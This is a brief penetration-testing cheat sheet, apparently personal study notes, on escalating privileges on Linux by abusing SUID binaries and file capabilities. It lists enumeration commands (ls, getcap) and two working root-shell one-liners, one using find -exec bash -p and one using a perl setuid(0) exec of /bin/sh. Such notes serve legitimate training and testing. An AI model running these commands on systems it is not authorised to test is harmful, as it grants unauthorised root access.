Abusing Setuid Binaries and Capabilities

NOTE: Ensure the utility has SUID set

EXAMPLE:

joe@debian-privesc:~$ ls -asl /usr/bin/passwd
64 -rwsr-xr-x 1 root root 63736 Jul 27  2018 /usr/bin/passwd
1

Search for capabilities vulnerability

/usr/sbin/getcap -r / 2>/dev/null
2

Search for vulnerability in internet

3

Exploit the vulnerability based on the website

EXAMPLE:

find /home/joe/Desktop -exec "/usr/bin/bash" -p \;
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
4

Enter command in newly spawned shell

Last updated